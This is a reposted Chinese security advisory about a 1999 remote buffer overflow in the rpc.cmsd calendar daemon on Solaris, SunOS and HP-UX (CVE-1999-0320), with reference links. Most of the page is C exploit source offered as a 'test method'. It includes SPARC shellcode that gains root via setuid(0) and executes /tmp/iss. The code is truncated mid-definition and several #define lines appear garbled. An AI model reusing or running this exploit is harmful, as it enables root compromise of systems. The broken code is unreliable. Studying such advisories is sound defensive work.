多家厂商rpc.cmsd远程缓冲区溢出漏洞

2008-04-09 04:33:52来源:互联网 阅读 ()

新老客户大回馈,云服务器低至5折

多家厂商rpc.cmsd远程缓冲区溢出漏洞

发布日期:1999-07-13
更新日期:1999-07-13

受影响系统:
Sun Solaris rpc.cmsd
- HP HP-UX 11.0
- HP HP-UX 10.30
- HP HP-UX 10.20
- Sun Solaris 7.0
- Sun Solaris 2.6
- Sun Solaris 2.5.1
- Sun Solaris 2.5
- Sun Solaris 2.4
- Sun Solaris 2.3
- Sun SunOS 4.1.4
- Sun SunOS 4.1.3_U1
- Sun SunOS 4.1.3c
- Sun SunOS 4.1.3
描述:
BUGTRAQ ID: 524
CVE(CAN) ID: CVE-1999-0320

rpc.cmsd(Calendar Manager Service daemon) RPC守护进程是一个用来安排日程的数据库管理器,是CDE桌面环境(Common Desktop Environment)的一个组件,在Solaris等一些Unix系统上是默认运行的。

rpc.cmsd在实现上存在一个缓冲区溢出漏洞远程,远程或本地攻击者可以利用此漏洞以root用户的权限执行任意指令。

<*链接:http://www.iss.net/security_center/static/2345.php
ftp://stage.caldera.com/pub/security/openunix/CSSA-2002-SCO.12
http://www.attrition.org/security/advisory/hpalert/hpux.00102
http://www.cert.org/advisories/CA-1999-08.html
http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=secbull/188&type=0&nav=sec.sba
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

/*
*
* cmsd warez
*
* executes /tmp/iss
*
* gcc -o c c.c -lrpcsvc -lnsl -lsocket
*
*/

#include <stdio.h>
#include <stdlib.h>
#include <rpc/rpc.h>
#include <netdb.h>
#include <arpa/inet.h>

char c0de[]=
"\x90\x08\x3f\xff" /* and %g0, -1, %o0 - 0 in o0 */
"\x82\x10\x20\x8d" /* mov 0x8d, %g1 - 0x8d==141==SYS_seteuid in g1 */
"\x91\xd0\x20\x08" /* ta 8 - seteuid(0); */
"\x90\x08\x3f\xff" /* and %g0, -1, %o0 - 0 in o0 */
"\x82\x10\x20\x17" /* mov 0x17, %g1 - 0x17==23==SYS_setuid in g1 */
"\x91\xd0\x20\x08" /* ta 8 - setuid(0); */
"\x2d\x0b\xdd\x1b" /* sethi %hi(0x2f746c00), %l6 */
"\xac\x15\xa1\x70" /* or %l6, 0x170, %l6 - "/tmp" */
"\x2f\x0b\xda\x5c" /* sethi %hi(0x2f697000), %l7 */
"\xae\x15\xe3\x73" /* or %l7, 0x373, %l7 - "/iss" */
"\x90\x0b\x80\x0e" /* and %sp, %sp, %o0 - addr of "/tmp/iss" in o0 */
"\x92\x03\xa0\x0c" /* add %sp, 0xc, %o1 - addr of ptr->"/tmp/iss" o1 */
"\x94\x1a\x80\x0a" /* xor %o2, %o2, %o2 - 0 in o2 (envp) */
"\x9c\x03\xa0\x14" /* add %sp, 0x14, %sp - (0x14==20) give space */
"\xec\x3b\xbf\xec" /* std %l6, [ %sp -20 ] - store "/tmp/iss" */
"\xc0\x23\xbf\xf4" /* clr [ %sp -12 ] - null term "/tmp/iss" */
"\xdc\x23\xbf\xf8" /* st %sp, [ %sp -8 ] - make ptr->"/tmp/iss" */
"\xc0\x23\xbf\xfc" /* clr [ %sp -4 ] - null term ptr array (argv) */
"\x82\x10\x20\x3b" /* mov 0x3b, %g1 - 0x3b==59==SYS_execve in g1 */
"\x91\xd0\x20\x08" /* ta 8 - execve(&"/tmp/iss",&(ptr->"/tmp/iss"),0) */
"\x90\x1b\xc0\x0f" /* xor %o7, %o7, %o0 - 0 in o0 */
"\x82\x10\x20\x01" /* mov 1, %g1 - 1==SYS_exit in g1 */
"\x91\xd0\x20\x08"; /* ta 8 - exit(0) */

#define X_OFFSET 5500
#define RW_OFFSET 800
#define NOPS 700
#define ALIGN (2000 sizeof(unsigned long)*7)
#define REG_W_SIZ 64
#define PRE_RET (REG_W_SIZ-3*sizeof(unsigned long))
#define OFBUFSIZ (BUFSIZ REG_W_SIZ NOPS sizeof(c0de)-sizeof(unsigned long))

char cname[] = "root@ISS";

/* ----- rpcgen ----- */

/*
* Please do not edit this file.
* It was generated using rpcgen.
*/

#ifndef _RTABLE4_H_RPCGEN
#define _RTABLE4_H_RPCGEN

#include <rpc/rpc.h>

typedef char *Buffer;

enum Transaction {
add = 0,
cm_remove = 1
};
typedef enum Transaction Transaction;

enum Interval {
single = 0,
daily = 1,
weekly = 2,
biweekly = 3,
monthly = 4,
yearly = 5,
nthWeekday = 6,
everyNthDay = 7,
everyNthWeek = 8,
everyNthMonth = 9,
otherPeriod = 10,
monThruFri = 11,
monWedFri = 12,
tueThur = 13,
daysOfWeek = 14

标签:

版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有

上一篇:Microsoft Windows NT IIS MDAC RDS远程命令执行漏洞(MS99-025

下一篇:Linux insmod漏洞